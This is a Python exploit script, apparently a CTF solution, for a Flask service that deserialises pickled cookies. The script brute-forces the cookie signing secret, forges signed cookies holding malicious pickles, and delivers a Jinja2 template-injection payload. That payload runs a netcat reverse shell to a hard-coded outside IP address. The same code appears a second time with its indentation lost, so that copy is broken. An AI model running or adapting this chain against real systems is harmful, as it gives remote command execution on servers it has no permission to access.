peternguyen93/python_revenge_exploit.py

## python_revenge_exploit.py
import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask


# class Target(object):
# 	def __reduce__(self):
# 		return (__import__, ('json',))

class Target(object):
	def __reduce__(self):
		return (repr, ('This is marked',))

class Import(object):
	def __reduce__(self):
		return (__import__, ('flask',))

shell = """
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{{ c.__init__.func_globals['linecache'].__dict__['os'].system('nc 139.59.244.42 31337 | /bin/sh | nc 139.59.244.42 31338') }}
{% endif %}
{% endfor %}
"""

class Execute(object):
	def __reduce__(self):
		return (flask.render_template_string, (shell,))

local = 'http://localhost:8888/'
remote = 'http://47.75.151.118:9999/'


def bruteforce():
	server_cookie = '59ffbf1cbbe71c7f918cf9af735c04dca74126386230590b39bdac432031fa44!VmFhYWFhCnAwCi4='
	_hash, data = server_cookie.split('!')

	charset = string.ascii_letters + string.digits
	# reverse = charset[::-1]

	for c in charset:
		for k in charset:
			for z in charset:
				for x in charset:
					secret = c + k + z + x
					print '[!] Try:',secret
					if hashlib.sha256(data + secret).hexdigest() == _hash:
						return secret

def cretae_cookie(data,secret):
	return '%s!%s' % (hashlib.sha256(data + secret).hexdigest(),data)

# secret = bruteforce()
# print 'Secret:',secret
secret = 'hitb'

local = remote

data =  b64encode(cPickle.dumps(Import()))
cookie = {'location' : cretae_cookie(data,secret)}
print cookie
requests.get(local,cookies=cookie)

cookie['location'] = cretae_cookie(b64encode(cPickle.dumps(Execute())),secret)
print cookie
req = requests.get(local,cookies=cookie)
print req.text
	import requests
	import cPickle
	import sys
	import os
	import hashlib
	from base64 import b64encode, b64decode
	import string
	import json
	import flask


	# class Target(object):
	# def __reduce__(self):
	# return (__import__, ('json',))

	class Target(object):
	def __reduce__(self):
	return (repr, ('This is marked',))

	class Import(object):
	def __reduce__(self):
	return (__import__, ('flask',))

	shell = """
	{% for c in [].__class__.__base__.__subclasses__() %}
	{% if c.__name__ == 'catch_warnings' %}
	{{ c.__init__.func_globals['linecache'].__dict__['os'].system('nc 139.59.244.42 31337 \| /bin/sh \| nc 139.59.244.42 31338') }}
	{% endif %}
	{% endfor %}
	"""

	class Execute(object):
	def __reduce__(self):
	return (flask.render_template_string, (shell,))

	local = 'http://localhost:8888/'
	remote = 'http://47.75.151.118:9999/'


	def bruteforce():
	server_cookie = '59ffbf1cbbe71c7f918cf9af735c04dca74126386230590b39bdac432031fa44!VmFhYWFhCnAwCi4='
	_hash, data = server_cookie.split('!')

	charset = string.ascii_letters + string.digits
	# reverse = charset[::-1]

	for c in charset:
	for k in charset:
	for z in charset:
	for x in charset:
	secret = c + k + z + x
	print '[!] Try:',secret
	if hashlib.sha256(data + secret).hexdigest() == _hash:
	return secret

	def cretae_cookie(data,secret):
	return '%s!%s' % (hashlib.sha256(data + secret).hexdigest(),data)

	# secret = bruteforce()
	# print 'Secret:',secret
	secret = 'hitb'

	local = remote

	data = b64encode(cPickle.dumps(Import()))
	cookie = {'location' : cretae_cookie(data,secret)}
	print cookie
	requests.get(local,cookies=cookie)

	cookie['location'] = cretae_cookie(b64encode(cPickle.dumps(Execute())),secret)
	print cookie
	req = requests.get(local,cookies=cookie)
	print req.text